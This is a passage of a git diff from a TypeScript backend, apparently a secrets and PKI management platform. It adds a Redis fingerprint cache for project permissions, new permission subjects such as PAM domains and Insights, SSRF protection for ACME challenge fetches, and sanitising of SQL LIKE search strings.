can(OrgPermissionGatewayPoolActions.ListGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.CreateGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.AttachGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.CreateRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.EditRelays, OrgPermissionSubjects.Relay); diff --git a/backend/src/ee/services/permission/permission-dal.ts b/backend/src/ee/services/permission/permission-dal.ts index a2994711880..09b0b71e36b 100644 --- 
a/backend/src/ee/services/permission/permission-dal.ts +++ b/backend/src/ee/services/permission/permission-dal.ts @@ -811,6 +811,8 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { // Lightweight permission fingerprint for ETag validation. // Same tables/joins/WHERE as getPermission but selects only IDs + timestamps, // then hashes in JS. The CASE expressions make the hash flip at temporary access expiry. + // Includes both project-scoped AND org-scoped memberships so that org-level + // permission changes (e.g. SSO bypass grant/revoke) also invalidate the cache. const getPermissionFingerprint: TPermissionDALFactory["getPermissionFingerprint"] = async ({ projectId, orgId, @@ -846,9 +848,25 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { `${TableName.AdditionalPrivilege}.projectId` ); }) + .leftJoin(TableName.IdentityMetadata, (qb) => { + if (actorType === ActorType.IDENTITY) { + qb.on(`${TableName.IdentityMetadata}.identityId`, `${TableName.Membership}.actorIdentityId`); + } else { + void qb + .on(`${TableName.IdentityMetadata}.userId`, db.raw("?", [actorId])) + .andOn(`${TableName.Membership}.scopeOrgId`, `${TableName.IdentityMetadata}.orgId`); + } + }) .where(`${TableName.Membership}.scopeOrgId`, orgId) - .where(`${TableName.Membership}.scope`, AccessScope.Project) - .where(`${TableName.Membership}.scopeProjectId`, projectId) + .where((scopeQb) => { + void scopeQb + .where((inner) => { + void inner + .where(`${TableName.Membership}.scope`, AccessScope.Project) + .where(`${TableName.Membership}.scopeProjectId`, projectId); + }) + .orWhere(`${TableName.Membership}.scope`, AccessScope.Organization); + }) .where((qb) => { const directCol = actorType === ActorType.USER @@ -864,6 +882,8 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { db.ref("updatedAt").withSchema(TableName.Role).as("crUp"), db.ref("id").withSchema(TableName.AdditionalPrivilege).as("pId"), 
db.ref("updatedAt").withSchema(TableName.AdditionalPrivilege).as("pUp"), + db.ref("id").withSchema(TableName.IdentityMetadata).as("imId"), + db.ref("updatedAt").withSchema(TableName.IdentityMetadata).as("imUp"), db.raw( `CASE WHEN "${TableName.MembershipRole}"."isTemporary" AND NOW() >= "${TableName.MembershipRole}"."temporaryAccessEndTime" THEN true ELSE false END AS "rExp"` ), diff --git a/backend/src/ee/services/permission/permission-service-types.ts b/backend/src/ee/services/permission/permission-service-types.ts index a74ad2626bf..00f11187292 100644 --- a/backend/src/ee/services/permission/permission-service-types.ts +++ b/backend/src/ee/services/permission/permission-service-types.ts @@ -1,6 +1,5 @@ import { MongoAbility } from "@casl/ability"; import { MongoQuery } from "@ucast/mongo2js"; -import { Knex } from "knex"; import { ActionProjectType, OrganizationActionScope, TMemberships } from "@app/db/schemas"; import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; @@ -126,5 +125,4 @@ export type TPermissionServiceFactory = { projectId: string; checkPermissions: ProjectPermissionSet; }) => Promise; - invalidateProjectPermissionCache: (projectId: string, tx?: Knex) => Promise; }; diff --git a/backend/src/ee/services/permission/permission-service.ts b/backend/src/ee/services/permission/permission-service.ts index 8c3e849267c..7f8fe8789f7 100644 --- a/backend/src/ee/services/permission/permission-service.ts +++ b/backend/src/ee/services/permission/permission-service.ts @@ -2,7 +2,6 @@ import { createMongoAbility, MongoAbility, RawRuleOf } from "@casl/ability"; import { PackRule, unpackRules } from "@casl/ability/extra"; import { requestContext } from "@fastify/request-context"; import handlebars from "handlebars"; -import { Knex } from "knex"; import { AccessScope, @@ -22,6 +21,7 @@ import { sshHostBootstrapPermissions } from "@app/ee/services/permission/default-roles"; import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from 
"@app/keystore/keystore"; +import { withCacheFingerprint } from "@app/lib/cache/with-cache"; import { conditionsMatcher } from "@app/lib/casl"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { objectify } from "@app/lib/fn"; @@ -167,69 +167,6 @@ export const permissionServiceFactory = ({ keyStore, roleDAL }: TPermissionServiceFactoryDep): TPermissionServiceFactory => { - const invalidateProjectPermissionCache = async (projectId: string, tx?: Knex) => { - const projectPermissionDalVersionKey = KeyStorePrefixes.ProjectPermissionDalVersion(projectId); - await keyStore.pgIncrementBy(projectPermissionDalVersionKey, { - incr: 1, - tx, - expiry: KeyStoreTtls.ProjectPermissionDalVersionTtl - }); - }; - - // akhilmdhh: will bring this up later - // const calculateProjectPermissionTtl = (membership: unknown): number => { - // const now = new Date(); - // let minTtl = KeyStoreTtls.ProjectPermissionCacheInSeconds; - // - // const getMinEndTime = (items: Array<{ temporaryAccessEndTime?: Date | null; isTemporary?: boolean }>) => { - // return items - // .filter((item) => item.isTemporary && item.temporaryAccessEndTime) - // .map((item) => item.temporaryAccessEndTime!) - // .filter((endTime) => endTime > now) - // .reduce((min, endTime) => (!min || endTime < min ? 
endTime : min), null as Date | null); - // }; - // - // const roleTimes: Date[] = []; - // const additionalPrivilegeTimes: Date[] = []; - // - // if ( - // membership && - // typeof membership === "object" && - // "roles" in membership && - // Array.isArray((membership as Record).roles) - // ) { - // const roles = (membership as Record).roles as Array<{ - // temporaryAccessEndTime?: Date | null; - // isTemporary?: boolean; - // }>; - // const minRoleEndTime = getMinEndTime(roles); - // if (minRoleEndTime) roleTimes.push(minRoleEndTime); - // } - // - // if ( - // membership && - // typeof membership === "object" && - // "additionalPrivileges" in membership && - // Array.isArray((membership as Record).additionalPrivileges) - // ) { - // const additionalPrivileges = (membership as Record).additionalPrivileges as Array<{ - // temporaryAccessEndTime?: Date | null; - // isTemporary?: boolean; - // }>; - // const minAdditionalEndTime = getMinEndTime(additionalPrivileges); - // if (minAdditionalEndTime) additionalPrivilegeTimes.push(minAdditionalEndTime); - // } - // - // const allEndTimes = [...roleTimes, ...additionalPrivilegeTimes]; - // if (allEndTimes.length > 0) { - // const nearestEndTime = allEndTimes.reduce((min, endTime) => (!min || endTime < min ? 
endTime : min)); - // const timeUntilExpiry = Math.floor((nearestEndTime.getTime() - now.getTime()) / 1000); - // minTtl = Math.min(minTtl, Math.max(1, timeUntilExpiry)); - // } - // - // return minTtl; - // }; - const getOrgPermission: TPermissionServiceFactory["getOrgPermission"] = async ({ actor, actorId, @@ -329,7 +266,9 @@ export const permissionServiceFactory = ({ const serviceToken = await serviceTokenDAL.findById(serviceTokenId); if (!serviceToken) throw new NotFoundError({ message: `Service token with ID '${serviceTokenId}' not found` }); - const serviceTokenProject = await projectDAL.findById(serviceToken.projectId); + const serviceTokenProject = await requestMemoize(requestMemoKeys.projectFindById(serviceToken.projectId), () => + projectDAL.findById(serviceToken.projectId) + ); if (!serviceTokenProject) throw new BadRequestError({ message: "Service token not linked to a project" }); @@ -360,6 +299,107 @@ export const permissionServiceFactory = ({ }; }; + const reviveCachedPermissionDates = ( + memberships: { + roles?: { temporaryAccessEndTime?: string | Date | null }[]; + additionalPrivileges?: { temporaryAccessEndTime?: string | Date | null }[]; + }[] + ) => { + for (const membership of memberships) { + for (const role of membership.roles ?? []) { + if (role.temporaryAccessEndTime) { + role.temporaryAccessEndTime = new Date(role.temporaryAccessEndTime); + } + } + for (const priv of membership.additionalPrivileges ?? 
[]) { + if (priv.temporaryAccessEndTime) { + priv.temporaryAccessEndTime = new Date(priv.temporaryAccessEndTime); + } + } + } + }; + + type TCachedProjectPermission = { + permissionData: Awaited>; + projectDetails: TProjects; + username: string; + canBypassSso: boolean; + }; + + const $fetchProjectPermissionData = async ( + projectId: string, + actorOrgId: string | undefined, + actionProjectType: ActionProjectType, + actor: ActorType.USER | ActorType.IDENTITY, + actorId: string + ): Promise => { + const projectDetails = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); + if (!projectDetails) { + throw new NotFoundError({ message: `Project with ${projectId} not found` }); + } + + if (projectDetails.orgId !== actorOrgId) { + throw new ForbiddenRequestError({ message: "This project does not belong to your selected organization." }); + } + + if (actionProjectType !== ActionProjectType.Any && actionProjectType !== projectDetails.type) { + throw new BadRequestError({ + message: `The project is of type ${projectDetails.type}. Operations of type ${actionProjectType} are not allowed.` + }); + } + + const permissionData = await permissionDAL.getPermission({ + scopeData: { + scope: AccessScope.Project, + orgId: projectDetails.orgId, + projectId + }, + actorId, + actorType: actor + }); + if (!permissionData?.length) + throw new ForbiddenRequestError({ + message: `You are not a member of this project with ID ${projectId}. Please assign this ${actor} to the project with the appropriate permissions, then try again.` + }); + + let username = ""; + if (actor === ActorType.USER) { + const userDetails = await userDAL.findById(actorId); + username = userDetails?.username ?? ""; + } else { + const identityDetails = await identityDAL.findById(actorId); + username = identityDetails?.name ?? 
""; + } + + // SSO bypass check (for USER actors) β€” pre-compute and cache the boolean + let canBypassSso = false; + if (actor === ActorType.USER) { + const enforceSsoAndBypassEnabled = + permissionData?.[0].orgAuthEnforced || + (permissionData?.[0].orgGoogleSsoAuthEnforced && permissionData?.[0].bypassOrgAuthEnabled); + + if (enforceSsoAndBypassEnabled) { + const orgIdForBypass = permissionData?.[0].rootOrgId ?? projectDetails.orgId; + const orgPermissionData = await permissionDAL.getPermission({ + scopeData: { scope: AccessScope.Organization, orgId: orgIdForBypass }, + actorId, + actorType: ActorType.USER + }); + if (orgPermissionData?.length) { + const orgPermissionFromRoles = flattenActiveRolesFromMemberships(orgPermissionData, OrgMembershipRole.Custom); + const orgPermission = createMongoAbility(buildOrgPermissionRules(orgPermissionFromRoles), { + conditionsMatcher + }); + canBypassSso = orgPermission.can(OrgPermissionSsoActions.BypassSsoEnforcement, OrgPermissionSubjects.Sso); + } + } + } + + return { permissionData, projectDetails, username, canBypassSso }; + }; + const getProjectPermission: TPermissionServiceFactory["getProjectPermission"] = async ({ actor: inputActor, actorId: inputActorId, @@ -371,6 +411,10 @@ export const permissionServiceFactory = ({ let actor = inputActor; let actorId = inputActorId; + if (!actorOrgId) { + throw new BadRequestError({ message: "Organization context is required for project permission checks" }); + } + if (actor === ActorType.SERVICE) { return getServiceTokenProjectPermission({ serviceTokenId: actorId, @@ -397,9 +441,7 @@ export const permissionServiceFactory = ({ name: "Get org permission" }); } - - const projectPermissionActor: ActorType.USER | ActorType.IDENTITY = - actor === ActorType.USER ? 
ActorType.USER : ActorType.IDENTITY; + const narrowedActor: ActorType.USER | ActorType.IDENTITY = actor; // Request-scoped full-function memoization: identical permission checks within the same request const memoKey = requestMemoKeys.projectPermission({ @@ -419,79 +461,51 @@ export const permissionServiceFactory = ({ }; const loadProjectPermission = async (): Promise => { - // DAL-level memoization: deduplicates projectDAL.findById across services - // (permission service, getBotKey, KMS) within the same request. - const projectDetails = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => - projectDAL.findById(projectId) - ); - if (!projectDetails) { - throw new NotFoundError({ message: `Project with ${projectId} not found` }); - } + // Layer 2: Redis fingerprint cache (marker 10s + data 10m) + const cached: TCachedProjectPermission = await withCacheFingerprint({ + keyStore, + dataKey: KeyStorePrefixes.ProjectPermissionData(projectId, narrowedActor, actorId, actionProjectType), + markerKey: KeyStorePrefixes.ProjectPermissionMarker(projectId, narrowedActor, actorId, actionProjectType), + markerTtlSeconds: KeyStoreTtls.ProjectPermissionMarkerTtlSeconds, + dataTtlSeconds: KeyStoreTtls.ProjectPermissionDataTtlSeconds, + fingerprintFetcher: () => + permissionDAL.getPermissionFingerprint({ + projectId, + orgId: actorOrgId, + actorId, + actorType: narrowedActor + }), + dataFetcher: () => + $fetchProjectPermissionData(projectId, actorOrgId, actionProjectType, narrowedActor, actorId), + reviver: (parsed: TCachedProjectPermission) => { + reviveCachedPermissionDates(parsed.permissionData); + } + }); - const projectDetailsCtx = { - id: projectDetails.id, - name: projectDetails.name, - slug: projectDetails.slug - }; + const { permissionData, projectDetails, username, canBypassSso } = cached; if (projectDetails.orgId !== actorOrgId) { throw new ForbiddenRequestError({ message: "This project does not belong to your selected organization." 
}); } - if (actionProjectType !== ActionProjectType.Any && actionProjectType !== projectDetails.type) { throw new BadRequestError({ message: `The project is of type ${projectDetails.type}. Operations of type ${actionProjectType} are not allowed.` }); } - const permissionData = await permissionDAL.getPermission({ - scopeData: { - scope: AccessScope.Project, - orgId: projectDetails.orgId, - projectId - }, - actorId, - actorType: projectPermissionActor - }); - if (!permissionData?.length) - throw new ForbiddenRequestError({ - message: `You are not a member of this project with ID ${projectId}. Please assign this ${projectPermissionActor} to the project with the appropriate permissions, then try again.` - }); + const projectDetailsCtx = { + id: projectDetails.id, + name: projectDetails.name, + slug: projectDetails.slug + }; const permissionFromRoles = flattenActiveRolesFromMemberships(permissionData, ProjectMembershipRole.Custom); const hasRole = (role: string) => permissionData.some((memberships) => memberships.roles.some((el) => role === (el.customRoleSlug || el.role))); - // SSO enforcement applies only to users; use org-level bypass criteria (Org Admin or BypassSsoEnforcement permission) - // When project is in sub-org, use root org for bypass check (SSO enforced at root; user's bypass permission is in root org) + // SSO enforcement runs on every request (uses per-request actorAuthMethod, not cached) if (actor === ActorType.USER) { - let canBypassSso = false; - const enforceSsoAndBypassEnabled = - permissionData?.[0].orgAuthEnforced || - (permissionData?.[0].orgGoogleSsoAuthEnforced && permissionData?.[0].bypassOrgAuthEnabled); - - if (enforceSsoAndBypassEnabled) { - const orgIdForBypass = permissionData?.[0].rootOrgId ?? 
projectDetails.orgId; - const orgPermissionData = await permissionDAL.getPermission({ - scopeData: { scope: AccessScope.Organization, orgId: orgIdForBypass }, - actorId, - actorType: ActorType.USER - }); - if (orgPermissionData?.length) { - const orgPermissionFromRoles = flattenActiveRolesFromMemberships( - orgPermissionData, - OrgMembershipRole.Custom - ); - const orgPermission = createMongoAbility( - buildOrgPermissionRules(orgPermissionFromRoles), - { - conditionsMatcher - } - ); - canBypassSso = orgPermission.can(OrgPermissionSsoActions.BypassSsoEnforcement, OrgPermissionSubjects.Sso); - } - } validateOrgSSO( actorAuthMethod, permissionData?.[0].orgAuthEnforced, @@ -511,19 +525,6 @@ export const permissionServiceFactory = ({ const metadataKeyValuePair = escapeHandlebarsMissingDict(unescapedMetadata, "identity.metadata"); const identityPermissionMetadataCtx = { metadata: unescapedMetadata }; - let username = ""; - if (actor === ActorType.USER) { - const userDetails = await requestMemoize(requestMemoKeys.userFindById(actorId), () => - userDAL.findById(actorId) - ); - username = userDetails?.username; - } else { - const identityDetails = await requestMemoize(requestMemoKeys.identityFindById(actorId), () => - identityDAL.findById(actorId) - ); - username = identityDetails?.name; - } - const unescapedIdentityAuthInfo = requestContext.get(RequestContextKey.IdentityAuthInfo); const identityAuthInfo = unescapedIdentityAuthInfo?.identityId === actorId && unescapedIdentityAuthInfo @@ -563,6 +564,7 @@ export const permissionServiceFactory = ({ }; }; + // Layer 1: in-memory per-request memoization β†’ Layer 2: Redis fingerprint cache β†’ Layer 3: DB const payload = memoizer ? 
await memoizer.getOrSet(memoKey, loadProjectPermission) : await loadProjectPermission(); requestContext.set(RequestContextKey.ProjectDetails, payload.projectDetailsCtx); @@ -820,7 +822,6 @@ export const permissionServiceFactory = ({ getProjectPermissions, getOrgPermissionByRoles, getProjectPermissionByRoles, - checkGroupProjectPermission, - invalidateProjectPermissionCache + checkGroupProjectPermission }; }; diff --git a/backend/src/ee/services/permission/project-permission.ts b/backend/src/ee/services/permission/project-permission.ts index b9a54294ea6..e16b338d76b 100644 --- a/backend/src/ee/services/permission/project-permission.ts +++ b/backend/src/ee/services/permission/project-permission.ts @@ -248,6 +248,10 @@ export enum ProjectPermissionAuditLogsActions { Read = "read" } +export enum ProjectPermissionInsightsActions { + Read = "read" +} + export enum ProjectPermissionPamAccountActions { Access = "access", Read = "read", @@ -337,6 +341,7 @@ export enum ProjectPermissionSub { PkiSubscribers = "pki-subscribers", PkiAlerts = "pki-alerts", PkiCollections = "pki-collections", + CertificateInventoryViews = "certificate-inventory-views", Kms = "kms", Cmek = "cmek", SecretSyncs = "secret-syncs", @@ -352,6 +357,7 @@ export enum ProjectPermissionSub { AppConnections = "app-connections", PamFolders = "pam-folders", PamResources = "pam-resources", + PamDomains = "pam-domains", PamAccounts = "pam-accounts", PamSessions = "pam-sessions", PamAccountPolicies = "pam-account-policies", @@ -362,7 +368,8 @@ export enum ProjectPermissionSub { ApprovalRequestGrants = "approval-request-grants", McpEndpoints = "mcp-endpoints", McpServers = "mcp-servers", - McpActivityLogs = "mcp-activity-logs" + McpActivityLogs = "mcp-activity-logs", + Insights = "insights" } // Structure: { [subject]: { [action]: allowedConditionKeys[] } } @@ -522,9 +529,11 @@ export type McpEndpointSubjectFields = { }; export type PamAccountSubjectFields = { - resourceName: string; + resourceName?: string; + 
resourceType?: string; + domainName?: string; + domainType?: string; accountName: string; - resourceType: string; metadata?: { key: string; value: string }[]; }; @@ -534,6 +543,12 @@ export type PamResourceSubjectFields = { metadata?: { key: string; value: string }[]; }; +export type PamDomainSubjectFields = { + name: string; + domainType: string; + metadata?: { key: string; value: string }[]; +}; + export type ProjectPermissionSet = | [ ProjectPermissionSecretActions, @@ -635,6 +650,7 @@ export type ProjectPermissionSet = | [ProjectPermissionActions, ProjectPermissionSub.SshHostGroups] | [ProjectPermissionActions, ProjectPermissionSub.PkiAlerts] | [ProjectPermissionActions, ProjectPermissionSub.PkiCollections] + | [ProjectPermissionActions, ProjectPermissionSub.CertificateInventoryViews] | [ProjectPermissionKmipActions, ProjectPermissionSub.Kmip] | [ProjectPermissionCmekActions, ProjectPermissionSub.Cmek] | [ProjectPermissionActions.Delete, ProjectPermissionSub.Project] @@ -665,6 +681,10 @@ export type ProjectPermissionSet = ProjectPermissionActions, ProjectPermissionSub.PamResources | (ForcedSubject & PamResourceSubjectFields) ] + | [ + ProjectPermissionActions, + ProjectPermissionSub.PamDomains | (ForcedSubject & PamDomainSubjectFields) + ] | [ ProjectPermissionPamAccountActions, ProjectPermissionSub.PamAccounts | (ForcedSubject & PamAccountSubjectFields) @@ -694,7 +714,8 @@ export type ProjectPermissionSet = ] | [ProjectPermissionApprovalRequestActions, ProjectPermissionSub.ApprovalRequests] | [ProjectPermissionApprovalRequestGrantActions, ProjectPermissionSub.ApprovalRequestGrants] - | [ProjectPermissionSecretApprovalRequestActions, ProjectPermissionSub.SecretApprovalRequest]; + | [ProjectPermissionSecretApprovalRequestActions, ProjectPermissionSub.SecretApprovalRequest] + | [ProjectPermissionInsightsActions, ProjectPermissionSub.Insights]; const SECRET_PATH_MISSING_SLASH_ERR_MSG = "Invalid Secret Path; it must start with a '/'"; const 
SECRET_PATH_PERMISSION_OPERATOR_SCHEMA = z.union([ @@ -1256,6 +1277,28 @@ const PamAccountConditionSchema = z }) .partial() ]), + domainName: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + domainType: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), metadata: z.object({ [PermissionConditionOperators.$ELEMENTMATCH]: z .object({ @@ -1326,6 +1369,53 @@ const PamResourceConditionSchema = z }) .partial(); +const PamDomainConditionSchema = z + .object({ + name: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + domainType: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: 
PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + metadata: z.object({ + [PermissionConditionOperators.$ELEMENTMATCH]: z + .object({ + key: z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN] + }) + .partial(), + value: z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN] + }) + .partial() + }) + .partial() + }) + }) + .partial(); + const CertificateAuthorityConditionSchema = z .object({ name: z.union([ @@ -1517,6 +1607,12 @@ const GeneralPermissionSchema = [ "Describe what action an entity can take." ) }), + z.object({ + subject: z.literal(ProjectPermissionSub.Insights).describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionInsightsActions).describe( + "Describe what action an entity can take." + ) + }), z.object({ subject: z.literal(ProjectPermissionSub.IpAllowList).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( @@ -1563,6 +1659,14 @@ const GeneralPermissionSchema = [ "Describe what action an entity can take." 
) }), + z.object({ + subject: z + .literal(ProjectPermissionSub.CertificateInventoryViews) + .describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( + "Describe what action an entity can take." + ) + }), z.object({ subject: z.literal(ProjectPermissionSub.PkiDiscovery).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionPkiDiscoveryActions).describe( @@ -1659,6 +1763,16 @@ const GeneralPermissionSchema = [ "When specified, only matching conditions will be allowed to access given resource." ).optional() }), + z.object({ + subject: z.literal(ProjectPermissionSub.PamDomains).describe("The entity this permission pertains to."), + inverted: z.boolean().optional().describe("Whether rule allows or forbids."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( + "Describe what action an entity can take." + ), + conditions: PamDomainConditionSchema.describe( + "When specified, only matching conditions will be allowed to access given domain." 
+ ).optional() + }), z.object({ subject: z.literal(ProjectPermissionSub.PamAccounts).describe("The entity this permission pertains to."), inverted: z.boolean().optional().describe("Whether rule allows or forbids."), diff --git a/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts b/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts index 2649e0a1108..391578cbb12 100644 --- a/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts +++ b/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts @@ -1,14 +1,16 @@ import { resolve4, Resolver } from "node:dns/promises"; -import axios, { AxiosError } from "axios"; +import { AxiosError, isAxiosError } from "axios"; import { TPkiAcmeChallenges } from "@app/db/schemas/pki-acme-challenges"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { isValidIp } from "@app/lib/ip"; import { isPrivateIp } from "@app/lib/ip/ipRange"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { ActorType } from "@app/services/auth/auth-type"; import { EventType, TAuditLogServiceFactory } from "../audit-log/audit-log-types"; @@ -93,10 +95,14 @@ export const pkiAcmeChallengeServiceFactory = ({ // TODO: read config from the profile to get the timeout instead const timeoutMs = 10 * 1000; // 10 seconds + + // SSRF protection: resolve DNS and block private/local IP addresses + await blockLocalAndPrivateIpAddresses(challengeUrl.toString()); + // Notice: well, we are in a transaction, ideally we should not hold transaction and perform // a long running operation for long time. But assuming we are not performing a tons of // challenge validation at the same time, it should be fine. 
- const challengeResponse = await axios.get(challengeUrl.toString(), { + const challengeResponse = await request.get(challengeUrl.toString(), { // In case if we override the host in the development mode, still provide the original host in the header // to help the upstream server to validate the request headers: { @@ -175,7 +181,7 @@ export const pkiAcmeChallengeServiceFactory = ({ try { // Properly type and inspect the error - if (axios.isAxiosError(exp)) { + if (isAxiosError(exp)) { const axiosError = exp as AxiosError; const errorCode = axiosError.code; const errorMessage = axiosError.message; diff --git a/backend/src/ee/services/pki-acme/pki-acme-service.ts b/backend/src/ee/services/pki-acme/pki-acme-service.ts index 3e261efc8da..0712a8222fe 100644 --- a/backend/src/ee/services/pki-acme/pki-acme-service.ts +++ b/backend/src/ee/services/pki-acme/pki-acme-service.ts @@ -13,7 +13,7 @@ import { z, ZodError } from "zod"; import { TPkiAcmeOrders } from "@app/db/schemas"; import { TPkiAcmeAccounts } from "@app/db/schemas/pki-acme-accounts"; import { TPkiAcmeAuths } from "@app/db/schemas/pki-acme-auths"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -398,6 +398,7 @@ export const pkiAcmeServiceFactory = ({ switch (orderWithCertificateRequest.certificateRequest.status) { case CertificateRequestStatus.PENDING: case CertificateRequestStatus.PENDING_APPROVAL: + case CertificateRequestStatus.PENDING_VALIDATION: break; case CertificateRequestStatus.ISSUED: newStatus = AcmeOrderStatus.Valid; @@ -435,13 +436,8 @@ export const pkiAcmeServiceFactory = ({ await validateAcmeProfile(profileId); const nonce = crypto.randomBytes(32).toString("base64url"); const nonceKey = 
KeyStorePrefixes.PkiAcmeNonce(nonce); - await keyStore.setItemWithExpiry( - nonceKey, - // Expire in 5 minutes. - // TODO: read config from the profile to get the expiration time instead - 60 * 5, - nonce - ); + // TODO: read config from the profile to get the expiration time instead + await keyStore.setItemWithExpiry(nonceKey, KeyStoreTtls.PkiAcmeNonceInSeconds, nonce); return nonce; }; diff --git a/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts b/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts index ab36cea7e51..7e28bc851e4 100644 --- a/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts +++ b/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiCertificateInstallations } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TPkiCertificateInstallationDALFactory = ReturnType; @@ -100,14 +101,15 @@ export const pkiCertificateInstallationDALFactory = (db: TDbClient) => { } if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void query.andWhere((qb: Knex.QueryBuilder) => { void qb - .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${search}%`) + .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${sanitizedSearch}%`) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'hostname' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'ipAddress' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]); }); } @@ -166,14 +168,15 @@ export const pkiCertificateInstallationDALFactory = (db: TDbClient) => { } if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void 
query.andWhere((qb: Knex.QueryBuilder) => { void qb - .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${search}%`) + .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${sanitizedSearch}%`) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'hostname' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'ipAddress' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]); }); } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts b/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts index acd6bd2aa73..a80c3546efb 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiDiscoveryConfigs } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from 